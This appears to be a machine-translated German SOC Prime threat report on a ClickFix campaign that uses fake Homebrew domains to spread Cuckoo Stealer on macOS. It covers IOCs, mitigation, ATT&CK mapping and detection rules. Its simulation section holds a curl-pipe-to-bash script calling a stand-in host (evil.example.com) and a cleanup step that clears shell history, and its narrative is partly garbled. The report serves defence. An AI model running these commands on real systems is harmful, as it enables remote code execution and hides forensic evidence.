SOC Prime Bias: Mittel

18 Feb. 2026 17:39
newspaper icon hunt.io

Gefälschte Homebrew-Typosquats zur Verbreitung von Cuckoo Stealer über ClickFix genutzt

Author Photo
Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime linkedin icon Folgen
Gefälschte Homebrew-Typosquats zur Verbreitung von Cuckoo Stealer über ClickFix genutzt
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Der Bericht beschreibt eine Kampagne, die typosquattierte Homebrew-Domains missbraucht, um macOS-Entwickler zu verleiten, bösartige „installieren“-Befehle über die ClickFix-Technik auszuführen. Ein gestalteter curl-Einzeiler leitet die Opfer zu einer vom Angreifer kontrollierten Infrastruktur, die einen Anmeldeinformations-stehlenden Loader und anschließend den Cuckoo Stealer-Infostealer liefert. Die Malware bleibt durch einen LaunchAgent bestehen, entfernt Quarantäne-Attribute und exportiert Anmeldeinformationen und Wallet-Daten über HTTPS. Die Erkennung sollte sich auf curl-Befehlsmuster und die zugehörige Infrastruktur konzentrieren.

Untersuchung

Forscher verfolgten den ersten Köder auf homabrews.org zurück, der auf 5.255.123.244 in den Niederlanden aufgelöst wurde und mehrere ähnliche Domains hostet (einschließlich raw.homabrews.org, das zur Bereitstellung verwendet wird). Das heruntergeladene Skript führt eine dscl authonly-Schleife aus, um macOS-Anmeldeinformationen zu validieren, und ruft dann eine Binärdatei namens brew_agent ab. In der zweiten Stufe erstellt Cuckoo Stealer eine LaunchAgent-Plist, entfernt Quarantäne-Flags und kommuniziert mit dem C2 unter Verwendung des X25519-Schlüsselaustauschs mit XOR-verschlüsselten Nutzlasten. Die Infrastrukturjagd deckte ein Netzwerk von mindestens sechs Domains auf, die dieselbe Hosting-IP teilen.

Minderung

Schulen Sie Entwickler darin, Homebrew-Installations-URLs zu überprüfen und das Kopieren und Einfügen von nicht vertrauenswürdigen Befehlen in das Terminal zu vermeiden. Aktivieren Sie die Protokollierung der Befehlszeile und beschränken Sie Muster, bei denen curl Skripte aus dem Internet zum sofortigen Ausführen herunterlädt, insbesondere Einzeiler im Stil von „curl | sh“. Der Endpunktschutz sollte bei verdächtigen LaunchAgent-Erstellungen und -Entfernungen von Quarantäne-Attributen alarmieren. Netzverteidigungen sollten bekannte bösartige Domains blockieren und den Verkehr zu raw.homabrews.org und verwandten Hosts flaggen.

Reaktion

Wenn ein verdächtiger curl-Befehl erkannt wird, isolieren Sie den Endpunkt, erfassen Sie das Skript und die brew_agent-Binärdatei und sammeln Sie die LaunchAgent-Plist zur Analyse. Setzen Sie kompromittierte Anmeldeinformationen zurück und widerrufen Sie kompromittierte Token, insbesondere für Browser, Schlüsselbund und Kryptowährungs-Wallets. Überprüfen Sie forensisch das versteckte BrewUpdater-Verzeichnis, alle erstellten Verknüpfungen und entfernen Sie die bösartigen Dateien. Aktualisieren Sie Erkennungen mit den extrahierten IOCs und überwachen Sie die Wiederverwendung derselben Infrastruktur.

„graph TB %% Klassendefinitionen classDef technique fill:#e6f2ff %% Knotendefinitionen node_A[„<b>Technik</b> – <b>T1659 Inhaltseinschleusung</b><br/><b>Beschreibung</b>: Angreifer hostet eine bösartige Webseite, die eine legitime Seite nachahmt, um bösartige Inhalte bereitzustellen, wenn ein Benutzer sie besucht.“] class node_A technique node_B[„<b>Technik</b> – <b>T1204.004 Benutzer-Ausführung: Bösartiges Kopieren & Einfügen</b><br/><b>Beschreibung</b>: Opfer kopiert einen gestalteten Befehl von einer Webseite und führt ihn in einem Terminal aus.“] class node_B technique node_C[„<b>Technik</b> – <b>T1059.004 Unix-Shell</b><br/><b>Beschreibung</b>: Verwendung einer Unix-Shell zum Herunterladen und Ausführen eines Erststufen-Skripts.“] class node_C technique node_D[„<b>Technik</b> – <b>T1555.001 Anmeldeinformationen aus Passwortspeichern: Schlüsselkette</b><br/><b>Beschreibung</b>: Zugriff auf macOS-Schlüsselkette zur Erfassung gespeicherter Anmeldeinformationen.“] class node_D technique node_E[„<b>Technik</b> – <b>T1555.003 Anmeldeinformationen aus Passwortspeichern: Webbrowser</b><br/><b>Beschreibung</b>: Extrahieren Sie gespeicherte Passwörter und Cookies aus Webbrowsern.“] class node_E technique node_F[„<b>Technik</b> – <b>T1539 Web-Sitzungscookie stehlen</b><br/><b>Beschreibung</b>: Sammeln Sie aktive Sitzungstoken von Browsern und Erweiterungen.“] class node_F technique node_G[„<b>Technik</b> – <b>T1614.001 System-Spracherkennung</b><br/><b>Beschreibung</b>: Abfrage der LANG-Umgebungsvariable zur Bestimmung des Systemsprache und zur Vermeidung bestimmter Regionen.“] class node_G technique node_H[„<b>Technik</b> – <b>T1543.001 Launch-Agent</b><br/><b>Beschreibung</b>: Installieren Sie eine benutzergebundene LaunchAgent-Plist für die Persistenz.“] class node_H technique node_I[„<b>Technik</b> – <b>T1553.001 Gatekeeper-Umgehung</b><br/><b>Beschreibung</b>: Entfernen des Quarantäne-Attributs mit xattr zur Umgehung von macOS Gatekeeper.“] class node_I technique node_J[„<b>Technik</b> – <b>T1027 Verschleierte Dateien oder Informationen</b><br/><b>Beschreibung</b>: XOR-verschlüsselte Zeichenfolgen, Nutzdaten und Konfiguration, um bösartige Inhalte zu verbergen.“] class node_J technique node_K[„<b>Technik</b> – <b>T1113 Bildschirmaufnahme</b><br/><b>Beschreibung</b>: Erfassen von Bildschirmfotos leise mit dem Screencapture-Dienstprogramm.“] class node_K technique node_L[„<b>Technik</b> – <b>T1119 Automatisierte Sammlung</b><br/><b>Beschreibung</b>: Wiederkehrende Erfassung von Kryptowährungs-Wallets, Notizen, Dokumenten und Messaging-Token.“] class node_L technique node_M[„<b>Technik</b> – <b>T1573 Verschlüsselter Kanal</b><br/><b>Beschreibung</b>: X25519 ECDH-Schlüsselaustausch durchführen, um einen verschlüsselten C2-Kanal zu erstellen.“] class node_M technique node_N[„<b>Technik</b> – <b>T1102.002 Webdienst: Bidirektionale Kommunikation</b><br/><b>Beschreibung</b>: Kommunikation mit dem Command-and-Control-Server über HTTPS.“] class node_N technique node_O[„<b>Technik</b> – <b>T1041 Exfiltration über C2-Kanal</b><br/><b>Beschreibung</b>: Übertragung gestohlener Daten über den verschlüsselten Kanal.“] class node_O technique node_P[„<b>Technik</b> – <b>T1529 Systemabschaltung/Neustart</b><br/><b>Beschreibung</b>: Ausführung eines Neustartbefehls auf Anweisung des Angreifers.“] class node_P technique node_Q[„<b>Technik</b> – <b>T1653 Energieeinstellungen</b><br/><b>Beschreibung</b>: Auslösen eines Neustarts des Systems zur Anwendung von Änderungen oder zur Unterbrechung der Vorfallreaktion.“] class node_Q technique node_R[„<b>Technik</b> – <b>T1070.009 Persistenz löschen</b><br/><b>Beschreibung</b>: Selbstzerstörung durch Entfernen von Binärdateien und der LaunchAgent-Plist.“] class node_R technique node_S[„<b>Technik</b> – <b>T1564.014 Verstecken von Artefakten: Erweiterte Attribute</b><br/><b>Beschreibung</b>: Entfernen des Quarantäne-Attributs, um Gatekeeper-Warnungen zu vermeiden.“] class node_S technique %% Verbindungen, die den Fluss zeigen node_A u002du002d>|führt_zu| node_B node_B u002du002d>|führt_zu| node_C node_C u002du002d>|führt_zu| node_D node_C u002du002d>|führt_zu| node_E node_C u002du002d>|führt_zu| node_F node_C u002du002d>|führt_zu| node_G node_C u002du002d>|führt_zu| node_H node_H u002du002d>|ermöglicht| node_I node_I u002du002d>|ermöglicht| node_J node_J u002du002d>|ermöglicht| node_K node_K u002du002d>|ermöglicht| node_L node_L u002du002d>|ermöglicht| node_M node_M u002du002d>|ermöglicht| node_N node_N u002du002d>|ermöglicht| node_O node_O u002du002d>|ermöglicht| node_P node_P u002du002d>|führt_zu| node_Q node_Q u002du002d>|führt_zu| node_R node_R u002du002d>|führt_zu| node_S „

Angriffsablauf

Erkennungen

Verdächtige Keychain-Aktivität (via process_creation)

SOC Prime-Team
18. Feb 2026

Ansehen

MacOS Verdächtige Tmp-Ordner-Dateiberechtigungsänderung (via cmdline)

SOC Prime-Team
18. Feb 2026

Ansehen

Verdächtige MacOS – Plist-Standorte und -Namen (via file_event)

SOC Prime-Team
18. Feb 2026

Ansehen

Verdächtiger Zugriff auf gespeicherte Browser-Anmeldedaten MacOS (via process_creation)

SOC Prime-Team
18. Feb 2026

Ansehen

MacOS-Systemlautstärke wurde mit Osascript stummgeschaltet (via cmdline)

SOC Prime-Team
18. Feb 2026

Ansehen

Mögliche Sammlung durch MacOS-Bildschirmaufnahme Ausführungsversuch (via cmdline)

SOC Prime-Team
18. Feb 2026

Ansehen

Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)

SOC Prime-Team
18. Feb 2026

Ansehen

IOCs (HashSha256) zum Erkennen: Gefälschte Homebrew-Typosquat-Domains, die zur Bereitstellung von Cuckoo Stealer über ClickFix verwendet werden

SOC Prime AI-Regeln
18. Feb 2026

Ansehen

IOCs (SourceIP) zum Erkennen: Gefälschte Homebrew-Typosquat-Domains, die zur Bereitstellung von Cuckoo Stealer über ClickFix verwendet werden

SOC Prime AI-Regeln
18. Feb 2026

Ansehen

IOCs (DestinationIP) zum Erkennen: Gefälschte Homebrew-Typosquat-Domains, die zur Bereitstellung von Cuckoo Stealer über ClickFix verwendet werden

SOC Prime AI-Regeln
18. Feb 2026

Ansehen

Erkennung von bösartigen macOS-Installationsbefehlen über ClickFix [Linux-Prozesserstellung]

SOC Prime AI-Regeln
18. Feb 2026

Ansehen

Erkennung einer Typosquatting-Domain und bösartiger IP in der ClickFix-Kampagne [Netzwerkindikatoren]

SOC Prime AI-Regeln
18. Feb 2026

Ansehen

Simulation Ablauf

Voraussetzung: Die Telemetrie- & Basislinientest-Vorabprüfung muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angreifertechnik (TTP), die dazu entwickelt wurde, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genau erwartete Telemetrie zu generieren, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:
    Ein Angreifer hat ein bösartiges PowerShell-kodiertes Skript erlangt, das auf einem C2-Server gehostet wird. Um das Schreiben von Dateien auf die Festplatte zu vermeiden, streamt der Angreifer das Skript direkt in eine Bash-Shell curl -fsSL und die -c Flagge. Der Befehl wird interaktiv von einem kompromittierten Benutzerkonto aus ausgeführt und imitiert einen legitimen „Klick-fix“ Installer. Die Schritte sind:

    1. Lösen Sie die bösartige Nutzlast-URL auf (z.B. https://evil.example.com/payload.sh).
    2. Leiten Sie den Download in Bash um und geben Sie Bash die Anweisung, den Inhalt mit -c.
    3. zu auszuführen Die Nutzlast führt die Ernte von Anmeldeinformationen durch, erstellt eine versteckte Datei und löscht dann das temporäre Skript (abdeckend).

  • Regressionstest-Skript:

    #!/usr/bin/env bash
# -------------------------------------------------
# Bösartigen macOS-Installer simulieren (ClickFix-Stil)
# -------------------------------------------------
set -euo pipefail

MALICIOUS_URL="https://evil.example.com/payload.sh"

# Streamen der Nutzlast direkt in Bash mit -c
curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)"

# Die Nutzlast selbst sollte ihre bösartigen Aktionen ausführen.
# Für den Testzweck geben wir einfach einen Marker aus.
echo "Bösartige Nutzlast ausgeführt"

  • Bereinigungsbefehle:

    # Entfernen Sie alle Dateien, die möglicherweise von der Nutzlast erstellt wurden
rm -f /tmp/payload.sh
# Optional, die Befehlsgeschichte löschen, um forensische Spuren zu reduzieren
history -c

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten